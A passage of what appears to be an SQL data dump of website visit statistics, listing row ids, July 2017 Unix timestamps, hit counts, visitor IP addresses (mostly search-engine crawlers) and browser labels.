00152116,1,1,0,0,'51.255.65.67','other'),(133120,1500152197,2,2,0,0,'87.250.224.7','other'),(133121,1500153085,1,1,0,0,'51.255.71.98','other'),(133122,1500153404,1,1,0,0,'95.108.179.15','other'),(133123,1500154149,1,1,0,0,'51.255.71.115','other'),(133124,1500154201,1,1,0,0,'51.255.65.86','other'),(133125,1500154433,1,1,0,0,'217.182.132.17','other'),(133126,1500154626,1,1,0,0,'51.255.71.128','other'),(133127,1500154634,1,1,0,0,'51.255.65.56','other'),(133128,1500155085,1,1,0,0,'91.209.11.236','other'),(133129,1500155215,1,0,1,0,'68.180.230.48',''),(133130,1500155292,1,1,0,0,'5.255.253.63','other'),(133131,1500155310,1,1,0,0,'95.108.213.34','other'),(133132,1500155328,1,1,0,0,'217.182.132.85','other'),(133133,1500155907,1,1,0,0,'51.255.65.31','other'),(133134,1500156171,1,1,0,0,'141.8.142.164','other'),(133135,1500157067,1,0,1,0,'66.249.76.89',''),(133136,1500157210,1,0,1,0,'68.180.230.48',''),(133137,1500157532,1,1,0,0,'217.182.132.153','other'),(133138,1500157830,1,1,0,0,'217.182.132.88','other'),(133139,1500158057,1,1,0,0,'95.108.213.34','other'),(133140,1500158998,1,1,0,0,'5.255.253.58','other'),(133141,1500159380,1,1,0,0,'141.8.142.164','other'),(133142,1500159425,1,1,0,0,'141.8.142.38','other'),(133143,1500159454,2,2,0,0,'216.244.66.246','other'),(133144,1500159777,1,1,0,0,'8.29.198.27','other'),(133145,1500159948,1,1,0,0,'87.250.224.7','other'),(133146,1500160005,1,1,0,0,'95.108.213.34','other'),(133147,1500160806,4,4,0,0,'216.244.66.194','other'),(133148,1500161500,1,1,0,0,'87.250.224.7','other'),(133149,1500161608,1,1,0,0,'51.255.65.90','other'),(133150,1500161681,1,1,0,0,'95.108.213.34','other'),(133151,1500161698,1,1,0,0,'217.69.133.2','other'),(133152,1500161913,1,1,0,0,'217.182.132.150','other'),(133153,1500162071,1,1,0,0,'91.209.11.236','other'),(133154,1500162109,1,1,0,0,'164.132.162.157','other'),(133155,1500162139,1,1,0,0,'217.182.132.7','other'),(133156,1500163211,1,1,0,0,'51.255.71.119','other'),(133157,1500163511,1,1,0,0,'217.182.132.179','other'),(133158,1500163887,1,1,0,0,'217.182.132.187','other'),(133159,1500164477,1,1,0,0,'51.255.65.62','other'),(133160,1500164974,2,2,0,0,'216.244.66.246','other'),(133161,1500165014,1,1,0,0,'87.250.224.7','other'),(133162,1500165421,1,0,1,0,'68.180.230.48',''),(133163,1500165454,1,1,0,0,'137.74.207.164','other'),(133164,1500165982,1,1,0,0,'217.182.132.37','other'),(133165,1500166448,1,1,0,0,'141.8.142.154','other'),(133166,1500166543,1,1,0,0,'51.255.65.60','other'),(133167,1500167076,1,1,0,0,'164.132.164.180','other'),(133168,1500167141,1,1,0,0,'95.108.179.15','other'),(133169,1500167187,2,2,0,0,'91.209.11.236','other'),(133170,1500167268,1,1,0,0,'51.255.65.43','other'),(133171,1500167377,1,1,0,0,'66.249.76.108','chrome'),(133172,1500167895,1,1,0,0,'51.255.65.48','other'),(133173,1500168388,1,1,0,0,'87.250.224.7','other'),(133174,1500168392,2,2,0,0,'216.244.66.246','other'),(133175,1500168471,1,1,0,0,'217.69.133.4','other'),(133176,1500168908,1,1,0,0,'91.209.11.236','other'),(133177,1500169101,2,2,0,0,'141.8.142.154','other'),(133178,1500169647,1,1,0,0,'5.255.253.63','other'),(133179,1500170053,1,1,0,0,'95.108.213.34','other'),(133180,1500170297,1,1,0,0,'141.8.142.154','other'),(133181,1500170613,1,1,0,0,'8.29.198.25','other'),(133182,1500170813,1,1,0,0,'217.182.132.21','other'),(133183,1500170833,1,1,0,0,'217.182.132.29','other'),(133184,1500170996,1,1,0,0,'141.8.142.164','other'),(133185,1500171097,1,1,0,0,'51.255.71.120','other'),(133186,1500171417,1,1,0,0,'164.132.162.187','other'),(133187,1500171459,1,1,0,0,'66.249.76.107','chrome'),(133188,1500171522,1,1,0,0,'178.154.200.45','other'),(133189,1500171525,1,1,0,0,'5.255.253.81','other'),(133190,1500171779,1,1,0,0,'217.182.132.50','other'),(133191,1500171923,1,1,0,0,'51.255.65.75','other'),(133192,1500172041,1,1,0,0,'141.8.142.154','other'),(133193,1500172285,1,1,0,0,'51.255.71.121','other'),(133194,1500172992,1,1,0,0,'51.255.65.37','other'),(133195,1500173204,1,1,0,0,'217.182.132.176','other'),(133196,1500173304,3,3,0,0,'216.244.66.194','other'),(133197,1500173344,1,1,0,0,'217.182.132.66','other'),(133198,1500173685,1,1,0,0,'51.255.65.35','other'),(133199,1500173844,1,1,0,0,'137.74.207.164','other'),(133200,1500173871,1,1,0,0,'77.37.180.165','chrome'),(133201,1500174179,1,1,0,0,'51.255.65.5','other'),(133202,1500174187,1,1,0,0,'51.255.65.6','other'),(133203,1500174252,1,0,1,0,'66.249.76.109',''),(133204,1500174973,1,1,0,0,'66.249.76.93','chrome'),(133205,1500174977,3,3,0,0,'216.244.66.246','other'),(133206,1500175517,1,1,0,0,'91.209.11.236','other'),(133207,1500176089,1,1,0,0,'5.255.253.63','other'),(133208,1500177078,1,1,0,0,'217.182.132.149','other'),(133209,1500177962,1,1,0,0,'91.209.11.236','other'),(133210,1500178385,1,1,0,0,'51.255.65.4','other'),(133211,1500178703,1,1,0,0,'5.255.253.63','other'),(133212,1500178903,1,1,0,0,'216.244.66.246','other'),(133213,1500179026,1,1,0,0,'87.250.224.7','other'),(133214,1500179242,1,1,0,0,'66.249.66.74','chrome'),(133215,1500180419,1,1,0,0,'51.255.71.132','other'),(133216,1500180592,3,3,0,0,'216.244.66.194','other'),(133217,1500180835,1,1,0,0,'51.255.65.24','other'),(133218,1500180905,1,1,0,0,'217.182.132.62','other'),(133219,1500181101,1,1,0,0,'51.255.65.33','other'),(133220,1500181323,1,1,0,0,'217.69.133.194','other'),(133221,1500181335,1,1,0,0,'217.69.133.3','other'),(133222,1500181438,1,1,0,0,'8.29.198.27','other'),(133223,1500181591,1,1,0,0,'137.74.207.161','other'),(133224,1500181764,2,2,0,0,'91.209.11.236','other'),(133225,1500181870,1,1,0,0,'137.74.207.108','other'),(133226,1500181948,1,1,0,0,'217.182.132.66','other'),(133227,1500182225,1,1,0,0,'217.182.132.71','other'),(133228,1500182240,1,0,1,0,'66.249.76.107',''),(133229,1500182794,1,1,0,0,'66.249.76.89','chrome'),(133230,1500182844,1,1,0,0,'141.8.142.164','other'),(133231,1500182862,2,2,0,0,'66.249.66.74','chrome'),(133232,1500182894,1,1,0,0,'51.255.65.64','other'),(133233,1500182964,1,1,0,0,'217.182.132.174','other'),(133234,1500183269,3,3,0,0,'216.244.66.194','other'),(133235,1500183519,1,1,0,0,'91.209.11.236','other'),(133236,1500184342,1,1,0,0,'141.8.142.164','other'),(133237,1500184605,1,1,0,0,'137.74.207.102','other'),(133238,1500184742,1,1,0,0,'91.209.11.236','other'),(133239,1500184744,1,1,0,0,'51.255.71.113','other'),(133240,1500184753,1,1,0,0,'95.108.213.34','other'),(133241,1500185246,1,1,0,0,'217.182.132.146','other'),(133242,1500185262,1,1,0,0,'207.46.13.100','other'),(133243,1500185570,1,1,0,0,'217.69.133.194','other'),(133244,1500185574,1,1,0,0,'217.69.133.2','other'),(133245,1500185667,1,1,0,0,'51.255.65.5','other'),(133246,1500185712,1,1,0,0,'51.255.65.224','other'),(133247,1500185728,2,2,0,0,'216.244.66.246','other'),(133248,1500185899,1,1,0,0,'5.255.253.63','other'),(133249,1500186175,1,1,0,0,'51.255.65.41','other'),(133250,1500186855,1,1,0,0,'51.255.65.43','other'),(133251,1500186989,1,1,0,0,'216.244.66.237','other'),(133252,1500187030,1,1,0,0,'217.69.133.5','other'),(133253,1500187400,1,1,0,0,'217.182.132.186','other'),(133254,1500187506,1,1,0,0,'51.255.71.129','other'),(133255,1500187769,3,3,0,0,'216.244.66.194','other'),(133256,1500188243,1,0,1,0,'66.249.76.93',''),(133257,1500188538,1,1,0,0,'5.255.253.63','other'),(133258,1500188569,1,1,0,0,'217.182.132.147','other'),(133259,1500188663,1,1,0,0,'51.255.71.126','other'),(133260,1500188748,1,1,0,0,'91.209.11.236','other'),(133261,1500190562,1,1,0,0,'91.209.11.236','other'),(133262,1500190651,3,3,0,0,'216.244.66.194','other'),(133263,1500190838,1,1,0,0,'217.182.132.29','other'),(133264,1500190990,1,1,0,0,'51.255.65.43','other'),(133265,1500191473,1,1,0,0,'178.154.200.37','other'),(133266,1500191475,1,1,0,0,'51.255.65.89','other'),(133267,1500192265,1,1,0,0,'8.29.198.25','other'),(133268,1500192400,1,1,0,0,'217.182.132.29','other'),(133269,1500192721,1,1,0,0,'217.69.133.5','other'),(133270,1500192747,1,1,0,0,'217.69.133.6','other'),(133271,1500192794,1,1,0,0,'51.255.65.93','other'),(133272,1500194197,1,1,0,0,'217.182.132.18','other'),(133273,1500194384,1,1,0,0,'207.46.13.71','other'),(133274,1500195019,1,0,1,0,'66.249.76.108',''),(133275,1500195108,1,1,0,0,'66.249.76.93','chrome'),(133276,1500195174,1,1,0,0,'66.249.76.89','chrome'),(133277,1500195349,1,1,0,0,'66.249.76.91','chrome'),(133278,1500195478,1,1,0,0,'66.249.76.109','chrome'),(133279,1500196212,1,1,0,0,'188.32.64.206','msie'),(133280,1500196558,1,1,0,0,'95.108.213.34','other'),(133281,1500197014,1,1,0,0,'51.255.71.121','other'),(133282,1500197045,1,1,0,0,'137.74.207.102','other'),(133283,1500197154,1,0,1,0,'68.180.230.48',''),(133284,1500197298,3,3,0,0,'216.244.66.246','other'),(133285,1500197715,1,1,0,0,'5.255.253.63','other'),(133286,1500197947,1,1,0,0,'51.255.65.36','other'),(133287,1500198345,1,1,0,0,'51.255.65.42','other'),(133288,1500198368,2,2,0,0,'95.108.179.15','other'),(133289,1500198482,1,1,0,0,'51.255.65.18','other'),(133290,1500198522,1,1,0,0,'51.255.65.65','other'),(133291,1500199004,1,1,0,0,'51.255.65.3','other'),(133292,1500199200,1,1,0,0,'217.182.132.193','other'),(133293,1500199229,1,1,0,0,'188.166.84.143','chrome'),(133294,1500199252,1,1,0,0,'51.255.65.13','other'),(133295,1500199646,2,2,0,0,'216.244.66.194','other'),(133296,1500199716,1,1,0,0,'5.255.253.63','other'),(133297,1500200000,1,1,0,0,'51.255.65.29','other'),(133298,1500200766,1,1,0,0,'51.255.65.84','other'),(133299,1500201052,1,1,0,0,'91.209.11.236','other'),(133300,1500201483,1,1,0,0,'217.182.132.55','other'),(133301,1500201821,1,1,0,0,'217.182.132.154','other'),(133302,1500202291,1,1,0,0,'51.255.65.31','other'),(133303,1500202381,2,2,0,0,'95.108.179.15','other'),(133304,1500202818,1,1,0,0,'216.244.66.194','other'),(133305,1500202995,1,1,0,0,'91.209.11.236','other'),(133306,1500203110,1,1,0,0,'8.29.198.25','other'),(133307,1500203112,1,1,0,0,'51.255.65.40','other'),(133308,1500203671,1,1,0,0,'95.108.213.34','other'),(133309,1500203675,1,1,0,0,'95.108.179.15','other'),(133310,1500203892,1,1,0,0,'180.76.15.9','other'),(133311,1500204005,1,1,0,0,'217.182.132.183','other'),(133312,1500204043,3,3,0,0,'216.244.66.246','other'),(133313,1500204826,1,1,0,0,'95.108.213.34','other'),(133314,1500205412,1,1,0,0,'51.255.65.61','other'),(133315,1500205493,1,1,0,0,'51.255.65.50','other'),(133316,1500206328,1,1,0,0,'87.250.224.7','other'),(133317,1500206839,1,1,0,0,'91.209.11.236','other'),(133318,1500207090,1,1,0,0,'87.250.224.18','other'),(133319,1500207099,1,1,0,0,'216.244.66.194','other'),(133320,1500207424,1,1,0,0,'66.102.9.29','chrome'),(133321,1500207440,1,1,0,0,'217.69.133.6','other'),(133322,1500207442,1,1,0,0,'91.196.178.37','firefox'),(133323,1500207524,1,1,0,0,'141.8.142.164','other'),(133324,1500207971,1,1,0,0,'137.74.207.161','other'),(133325,1500208278,1,1,0,0,'141.8.142.154','other'),(133326,1500208352,1,1,0,0,'217.182.132.187','other'),(133327,1500208434,1,1,0,0,'157.55.39.179','other'),(133328,1500208444,1,1,0,0,'51.255.65.34','other'),(133329,1500208590,1,1,0,0,'51.255.65.57','other'),(133330,1500208626,4,4,0,0,'216.244.66.246','other'),(133331,1500209556,1,1,0,0,'217.182.132.27','other'),(133332,1500209619,1,1,0,0,'141.8.142.154','other'),(133333,1500210113,1,1,0,0,'51.255.65.90','other'),(133334,1500210360,2,2,0,0,'95.108.213.34','other'),(133335,1500211250,1,1,0,0,'95.108.179.15','other'),(133336,1500211324,1,1,0,0,'217.182.132.154','other'),(133337,1500211516,1,1,0,0,'141.8.142.164','other'),(133338,1500211641,1,1,0,0,'217.182.132.59','other'),(133339,1500212229,1,1,0,0,'66.249.76.131','chrome'),(133340,1500212323,1,1,0,0,'51.255.65.39','other'),(133341,1500212506,1,1,0,0,'91.209.11.236','other'),(133342,1500212516,1,1,0,0,'141.8.142.154','other'),(133343,1500213262,1,1,0,0,'216.244.66.246','other'),(133344,1500213330,1,1,0,0,'5.255.253.63','other'),(133345,1500213565,1,1,0,0,'217.182.132.81','other'),(133346,1500213585,1,1,0,0,'216.244.66.194','other'),(133347,1500213708,1,1,0,0,'51.255.65.68','other'),(133348,1500213950,1,1,0,0,'8.29.198.26','other'),(133349,1500214093,2,1,1,0,'66.249.76.131',''),(133350,1500214139,1,1,0,0,'91.196.178.66','chrome'),(133351,1500214290,1,1,0,0,'217.182.132.54','other'),(133352,1500214715,1,1,0,0,'217.182.132.86','other'),(133353,1500214936,1,1,0,0,'217.182.132.172','other'),(133354,1500214962,1,1,0,0,'51.255.71.117','other'),(133355,1500215529,1,1,0,0,'5.255.253.63','other'),(133356,1500215600,1,0,1,0,'68.180.230.48',''),(133357,1500215638,1,1,0,0,'217.69.133.4','other'),(133358,1500215676,1,1,0,0,'95.108.213.34','other'),(133359,1500215832,1,1,0,0,'66.249.66.155','chrome'),(133360,1500216206,2,2,0,0,'91.205.206.83','chrome'),(133361,1500216488,1,1,0,0,'51.255.65.32','other'),(133362,1500216689,2,2,0,0,'188.231.135.178','chrome'),(133363,1500217003,1,1,0,0,'164.132.162.157','other'),(133364,1500217035,1,1,0,0,'217.182.132.146','other'),(133365,1500217287,5,5,0,0,'216.244.66.246','other'),(133366,1500217373,1,1,0,0,'217.182.132.19','other'),(133367,1500217475,1,1,0,0,'51.255.65.51','other'),(133368,1500217689,1,1,0,0,'63.243.252.198','other'),(133369,1500217713,1,1,0,0,'207.46.13.100','other'),(133370,1500218135,1,1,0,0,'217.182.132.15','other'),(133371,1500218399,1,1,0,0,'66.249.76.131','chrome'),(133372,1500218490,1,1,0,0,'37.54.18.61','chrome'),(133373,1500218869,1,1,0,0,'188.255.23.231','chrome'),(133374,1500219170,1,1,0,0,'95.108.213.34','other'),(133375,1500219513,1,1,0,0,'51.255.65.59','other'),(133376,1500220223,1,1,0,0,'51.255.71.120','other'),(133377,1500220831,2,2,0,0,'216.244.66.194','other'),(133378,1500220945,1,1,0,0,'217.182.132.58','other'),(133379,1500221192,1,1,0,0,'5.255.253.63','other'),(133380,1500221511,1,0,1,0,'68.180.230.48',''),(133381,1500221546,2,2,0,0,'141.8.142.164','other'),(133382,1500221859,1,1,0,0,'87.250.224.18','other'),(133383,1500222545,1,1,0,0,'137.74.207.108','other'),(133384,1500222931,1,1,0,0,'51.255.65.46','other'),(133385,1500223136,1,1,0,0,'51.255.71.100','other'),(133386,1500223274,1,1,0,0,'180.76.15.155','other'),(133387,1500223640,1,1,0,0,'51.255.65.11','other'),(133388,1500223977,1,1,0,0,'87.250.224.7','other'),(133389,1500223986,1,1,0,0,'51.255.65.224','other'),(133390,1500224361,3,3,0,0,'216.244.66.246','other'),(133391,1500224735,2,2,0,0,'91.209.11.236','other'),(133392,1500224788,1,1,0,0,'8.29.198.25','other'),(133393,1500225021,1,1,0,0,'51.255.65.12','other'),(133394,1500225264,1,1,0,0,'217.182.132.184','other'),(133395,1500225847,1,1,0,0,'91.209.11.236','other'),(133396,1500227609,2,2,0,0,'216.244.66.246','other'),(133397,1500227848,1,1,0,0,'51.255.65.19','other'),(133398,1500228203,2,2,0,0,'216.244.66.194','other'),(133399,1500228902,1,1,0,0,'217.182.132.193','other'),(133400,1500229460,1,1,0,0,'87.250.224.7','other'),(133401,1500229516,1,1,0,0,'95.108.179.15','other'),(133402,1500229553,1,1,0,0,'91.209.11.236','other'),(133403,1500229660,1,1,0,0,'217.182.132.70','other'),(133404,1500230768,1,1,0,0,'217.182.132.78','other'),(133405,1500231026,1,1,0,0,'95.108.179.15','other'),(133406,1500231332,1,1,0,0,'217.182.132.32','other'),(133407,1500232004,1,1,0,0,'217.182.132.63','other'),(133408,1500232417,1,1,0,0,'137.74.201.99','other'),(133409,1500232823,4,4,0,0,'216.244.66.194','other'),(133410,1500232964,2,2,0,0,'91.209.11.236','other'),(133411,1500233068,1,1,0,0,'87.250.224.7','other'),(133412,1500233297,1,1,0,0,'217.182.132.192','other'),(133413,1500233306,1,1,0,0,'141.8.142.154','other'),(133414,1500233647,1,1,0,0,'51.255.65.90','other'),(133415,1500233957,1,1,0,0,'46.211.114.195','chrome'),(133416,1500234252,2,2,0,0,'216.244.66.246','other'),(133417,1500234465,2,2,0,0,'91.209.11.236','other'),(133418,1500235623,1,1,0,0,'8.29.198.27','other'),(133419,1500235809,1,0,1,0,'66.249.66.156',''),(133420,1500235872,1,1,0,0,'66.249.66.155','chrome'),(133421,1500235913,1,1,0,0,'137.74.203.194','other'),(133422,1500236230,1,1,0,0,'51.255.65.16','other'),(133423,1500236610,1,1,0,0,'217.182.132.55','other'),(133424,1500236656,1,1,0,0,'216.244.66.237','other'),(133425,1500237128,1,1,0,0,'137.74.207.101','other'),(133426,1500237370,1,1,0,0,'216.244.66.194','other'),(133427,1500237690,1,1,0,0,'217.182.132.93','other'),(133428,1500237756,1,1,0,0,'217.182.132.20','other'),(133429,1500238047,1,1,0,0,'137.74.207.164','other'),(133430,1500238248,1,1,0,0,'137.74.203.194','other'),(133431,1500238322,1,1,0,0,'51.255.65.26','other'),(133432,1500238336,1,1,0,0,'180.76.15.13','other'),(133433,1500238567,1,1,0,0,'91.209.11.236','other'),(133434,1500238589,1,1,0,0,'217.182.132.53','other'),(133435,1500238857,1,1,0,0,'51.255.65.4','other'),(133436,1500239563,1,1,0,0,'46.229.168.71','other'),(133437,1500239574,1,1,0,0,'217.182.132.88','other'),(133438,1500239592,1,1,0,0,'66.249.76.137','chrome'),(133439,1500239794,1,1,0,0,'51.255.65.21','other'),(133440,1500240124,1,1,0,0,'141.8.142.154','other'),(133441,1500240258,1,1,0,0,'93.75.143.220','chrome'),(133442,1500240409,1,1,0,0,'91.209.11.236','other'),(133443,1500240414,1,1,0,0,'51.255.65.79','other'),(133444,1500240502,1,1,0,0,'51.255.65.52','other'),(133445,1500240693,1,1,0,0,'51.255.71.118','other'),(133446,1500240732,1,1,0,0,'46.161.9.55','chrome'),(133447,1500241167,2,2,0,0,'95.108.179.15','other'),(133448,1500241484,1,1,0,0,'178.154.149.3','other'),(133449,1500241585,1,1,0,0,'87.250.224.8','other'),(133450,1500242240,1,1,0,0,'91.209.11.236','other'),(133451,1500242325,1,1,0,0,'51.255.65.96','other'),(133452,1500242579,1,1,0,0,'87.250.224.7','other'),(133453,1500243060,1,1,0,0,'217.182.132.155','other'),(133454,1500244215,1,1,0,0,'51.255.65.63','other'),(133455,1500244514,2,2,0,0,'216.244.66.194','other'),(133456,1500244857,2,2,0,0,'216.244.66.246','other'),(133457,1500245231,1,1,0,0,'207.46.13.100','other'),(133458,1500245425,1,1,0,0,'217.182.132.37','other'),(133459,1500245575,1,1,0,0,'51.255.65.2','other'),(133460,1500245944,1,1,0,0,'95.108.179.15','other'),(133461,1500246140,1,1,0,0,'213.141.131.237','msie'),(133462,1500246459,1,1,0,0,'8.29.198.26','other'),(133463,1500246752,1,1,0,0,'141.8.142.154','other'),(133464,1500248198,1,1,0,0,'141.8.142.154','other'),(133465,1500248273,1,1,0,0,'217.182.132.64','other'),(133466,1500248824,1,1,0,0,'216.244.66.246','other'),(133467,1500249253,1,1,0,0,'51.255.65.15','other'),(133468,1500249779,1,1,0,0,'141.8.142.164','other'),(133469,1500250338,1,1,0,0,'207.46.13.71','other'),(133470,1500250474,1,1,0,0,'66.249.76.91','chrome'),(133471,1500251009,1,1,0,0,'95.108.213.34','other'),(133472,1500251044,1,1,0,0,'91.209.11.236','other'),(133473,1500251139,1,1,0,0,'51.255.71.130','other'),(133474,1500251450,1,1,0,0,'141.8.142.164','other'),(133475,1500251638,1,1,0,0,'217.182.132.19','other'),(133476,1500251765,1,1,0,0,'216.244.66.194','other'),(133477,1500252109,1,1,0,0,'51.255.65.56','other'),(133478,1500253016,1,1,0,0,'217.182.132.20','other'),(133479,1500253035,1,1,0,0,'91.209.11.236','other'),(133480,1500253200,1,1,0,0,'51.255.71.111','other'),(133481,1500253386,1,1,0,0,'217.69.133.194','other'),(133482,1500253585,3,3,0,0,'216.244.66.246','other'),(133483,1500253616,1,1,0,0,'87.250.224.7','other'),(133484,1500253858,1,1,0,0,'217.182.132.33','other'),(133485,1500254306,1,1,0,0,'51.255.65.72','other'),(133486,1500254640,1,1,0,0,'141.8.142.164','other'),(133487,1500254710,1,1,0,0,'87.250.224.7','other'),(133488,1500254997,1,1,0,0,'51.255.71.125','other'),(133489,1500255158,1,1,0,0,'95.108.179.15','other'),(133490,1500255318,1,1,0,0,'216.244.66.237','other'),(133491,1500256038,1,1,0,0,'217.69.133.194','other'),(133492,1500256439,1,1,0,0,'216.244.66.194','other'),(133493,1500257011,1,1,0,0,'217.182.132.4','other'),(133494,1500257238,1,1,0,0,'141.8.142.164','other'),(133495,1500257289,1,1,0,0,'8.29.198.27','other'),(133496,1500258079,1,1,0,0,'216.244.66.237','other'),(133497,1500258349,1,1,0,0,'51.255.65.41','other'),(133498,1500258588,1,1,0,0,'217.182.132.63','other'),(133499,1500258727,1,1,0,0,'217.182.132.80','other'),(133500,1500259503,1,0,1,0,'66.249.76.131',''),(133501,1500259688,1,1,0,0,'66.249.76.131','chrome'),(133502,1500260071,1,1,0,0,'51.255.71.132','other'),(133503,1500260473,2,2,0,0,'216.244.66.246','other'),(133504,1500260475,1,1,0,0,'141.8.142.154','other'),(133505,1500260518,1,1,0,0,'217.182.132.71','other'),(133506,1500261244,2,2,0,0,'216.244.66.194','other'),(133507,1500261742,1,1,0,0,'178.255.215.94','other'),(133508,1500262205,1,1,0,0,'51.255.65.53','other'),(133509,1500262219,1,1,0,0,'87.250.224.7','other'),(133510,1500262656,1,1,0,0,'216.244.66.246','other'),(133511,1500262677,1,1,0,0,'51.255.65.65','other'),(133512,1500263040,1,1,0,0,'95.108.179.15','other'),(133513,1500263297,2,2,0,0,'95.213.141.126','opera'),(133514,1500263556,1,1,0,0,'51.255.65.21','other'),(133515,1500264477,1,1,0,0,'217.182.132.83','other'),(133516,1500264484,1,1,0,0,'217.182.132.172','other'),(133517,1500264714,1,1,0,0,'51.255.65.7','other'),(133518,1500266352,5,5,0,0,'216.244.66.194','other'),(133519,1500266397,1,1,0,0,'91.196.178.70','firefox'),(133520,1500266413,1,1,0,0,'95.108.179.15','other'),(133521,1500266458,1,1,0,0,'95.108.213.34','other'),(133522,1500267031,1,1,0,0,'217.182.132.54','other'),(133523,1500267370,1,1,0,0,'137.74.207.114','other'),(133524,1500267902,1,1,0,0,'137.74.207.119','other'),(133525,1500268038,2,2,0,0,'216.244.66.246','other'),(133526,1500268125,1,1,0,0,'8.29.198.25','other'),(133527,1500268145,1,1,0,0,'217.182.132.63','other'),(133528,1500268512,1,1,0,0,'87.250.224.7','other'),(133529,1500268576,2,2,0,0,'216.244.66.194','other'),(133530,1500268962,1,1,0,0,'178.255.215.94','other'),(133531,1500268983,1,1,0,0,'51.255.65.68','other'),(133532,1500269103,1,1,0,0,'217.182.132.66','other'),(133533,1500269243,1,1,0,0,'216.244.66.246','other'),(133534,1500269372,1,1,0,0,'137.74.207.119','other'),(133535,1500269581,14,14,0,0,'91.209.51.22','other'),(133536,1500269869,1,1,0,0,'87.250.224.7','other'),(133537,1500270087,1,1,0,0,'51.255.65.41','other'),(133538,1500270511,1,1,0,0,'109.63.205.123','chrome'),(133539,1500270646,1,1,0,0,'51.255.71.121','other'),(133540,1500270984,1,1,0,0,'95.108.213.34','other'),(133541,1500271039,1,1,0,0,'217.69.133.4','other'),(133542,1500271920,1,1,0,0,'91.209.11.236','other'),(133543,1500272001,1,1,0,0,'51.255.65.47','other'),(133544,1500273418,1,1,0,0,'51.255.65.3','other'),(133545,1500273491,1,1,0,0,'137.74.207.161','other'),(133546,1500273984,1,1,0,0,'195.211.173.200','chrome'),(133547,1500274644,1,1,0,0,'91.214.179.10','firefox'),(133548,1500274646,1,1,0,0,'216.244.66.194','other'),(133549,1500274962,1,1,0,0,'51.255.65.13','other'),(133550,1500275141,1,1,0,0,'5.255.253.63','other'),(133551,1500275209,1,1,0,0,'51.255.65.57','other'),(133552,1500275497,1,1,0,0,'217.182.132.77','other'),(133553,1500275586,2,0,2,0,'68.180.230.48',''),(133554,1500275612,1,1,0,0,'93.183.226.149','chrome'),(133555,1500276147,5,5,0,0,'216.244.66.194','other'),(133556,1500276162,1,1,0,0,'176.122.105.147','chrome'),(133557,1500276178,1,1,0,0,'95.108.179.15','other'),(133558,1500276278,1,1,0,0,'217.182.132.188','other'),(133559,1500276382,2,2,0,0,'216.244.66.246','other'),(133560,1500276391,1,1,0,0,'51.255.71.129','other'),(133561,1500276423,1,1,0,0,'217.182.132.61','other'),(133562,1500276429,1,1,0,0,'91.196.178.67','chrome'),(133563,1500276560,1,0,1,0,'66.249.66.76',''),(133564,1500276600,1,1,0,0,'66.249.76.91','chrome'),(133565,1500276831,1,1,0,0,'217.182.132.181','other'),(133566,1500276972,1,1,0,0,'95.135.32.178','chrome'),(133567,1500277362,1,1,0,0,'51.255.65.51','other'),(133568,1500277480,1,1,0,0,'51.255.71.127','other'),(133569,1500277584,2,2,0,0,'91.209.11.236','other'),(133570,1500277924,1,1,0,0,'51.255.65.26','other'),(133571,1500277925,1,1,0,0,'93.183.229.76','chrome'),(133572,1500277977,1,1,0,0,'51.255.71.101','other'),(133573,1500278207,1,1,0,0,'141.8.142.154','other'),(133574,1500278286,1,1,0,0,'217.69.133.6','other'),(133575,1500278416,4,4,0,0,'216.244.66.194','other'),(133576,1500278442,2,2,0,0,'87.250.224.7','other'),(133577,1500278511,1,1,0,0,'51.255.71.125','other'),(133578,1500278538,1,1,0,0,'217.182.132.175','other'),(133579,1500278580,1,1,0,0,'178.255.215.94','other'),(133580,1500278638,1,1,0,0,'141.8.142.164','other'),(133581,1500278813,1,1,0,0,'207.46.13.100','other'),(133582,1500278864,2,2,0,0,'91.196.179.134','chrome'),(133583,1500278953,1,1,0,0,'8.29.198.27','other'),(133584,1500279318,1,1,0,0,'95.108.213.34','other'),(133585,1500279436,1,1,0,0,'51.255.65.90','other'),(133586,1500280195,1,1,0,0,'51.255.65.59','other'),(133587,1500280612,2,2,0,0,'216.244.66.246','other'),(133588,1500280661,1,1,0,0,'51.255.65.55','other'),(133589,1500280702,1,1,0,0,'95.108.179.15','other'),(133590,1500280731,1,1,0,0,'141.8.142.154','other'),(133591,1500280742,1,1,0,0,'91.196.178.70','chrome'),(133592,1500280957,1,1,0,0,'217.182.132.170','other'),(133593,1500281017,2,2,0,0,'185.182.81.83','chrome'),(133594,1500281324,1,1,0,0,'51.255.65.31','other'),(133595,1500281685,1,1,0,0,'194.44.211.114','chrome'),(133596,1500281888,1,1,0,0,'216.244.66.194','other'),(133597,1500282026,1,1,0,0,'91.196.178.70','chrome'),(133598,1500282475,1,1,0,0,'91.196.178.161','chrome'),(133599,1500282623,1,1,0,0,'91.196.178.34','chrome'),(133600,1500282906,1,1,0,0,'217.182.132.156','other'),(133601,1500283048,1,1,0,0,'216.244.66.237','other'),(133602,1500283147,1,1,0,0,'141.8.142.154','other'),(133603,1500283260,1,1,0,0,'217.182.132.80','other'),(133604,1500283267,1,1,0,0,'51.255.65.87','other'),(133605,1500283333,1,1,0,0,'217.182.132.190','other'),(133606,1500283340,1,1,0,0,'46.219.233.251','chrome'),(133607,1500283724,1,1,0,0,'46.133.94.80','other'),(133608,1500283895,1,0,1,0,'66.249.66.155',''),(133609,1500284166,1,1,0,0,'82.145.223.82','opera'),(133610,1500284186,1,1,0,0,'217.69.133.203','other'),(133611,1500284406,1,1,0,0,'217.182.132.77','other'),(133612,1500285065,1,1,0,0,'51.255.65.57','other'),(133613,1500285079,1,1,0,0,'137.74.207.161','other'),(133614,1500285528,1,1,0,0,'217.182.132.20','other'),(133615,1500285716,4,4,0,0,'216.244.66.194','other'),(133616,1500285991,1,1,0,0,'95.108.213.34','other'),(133617,1500286208,1,1,0,0,'51.255.65.39','other'),(133618,1500286616,1,1,0,0,'51.255.65.80','other'),(133619,1500286625,1,1,0,0,'217.182.132.79','other'),(133620,1500286673,1,1,0,0,'91.196.178.68','firefox'),(133621,1500287080,1,1,0,0,'137.74.207.188','other'),(133622,1500287146,1,1,0,0,'80.70.77.155','chrome'),(133623,1500287597,1,1,0,0,'164.132.162.156','other'),(133624,1500288149,1,1,0,0,'94.179.51.121','chrome'),(133625,1500288166,1,1,0,0,'217.182.132.85','other'),(133626,1500288232,1,1,0,0,'217.182.132.157','other'),(133627,1500288329,1,1,0,0,'95.108.213.7','other'),(133628,1500288428,2,2,0,0,'5.255.253.63','other'),(133629,1500288449,1,1,0,0,'46.219.238.202','chrome'),(133630,1500288457,1,1,0,0,'91.196.178.162','chrome'),(133631,1500288696,1,1,0,0,'137.74.207.101','other'),(133632,1500288798,1,1,0,0,'217.69.133.5','other'),(133633,1500289312